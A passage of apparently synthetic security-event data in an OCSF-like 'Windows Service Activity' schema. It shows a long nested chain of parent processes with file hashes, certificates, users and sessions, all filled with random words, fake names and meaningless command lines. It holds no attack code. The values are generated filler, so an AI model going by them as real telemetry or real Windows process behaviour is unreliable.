201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": {\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": \"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": 
\"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": \"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", 
\"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": \"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": \"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": 
{\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": 
\"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, 
\"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": \"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", 
\"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": \"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 
1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": \"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 
1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, 
\"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": 
\"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": \"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": 
\"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": \"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, \"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": 
\"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", \"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner 
working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": 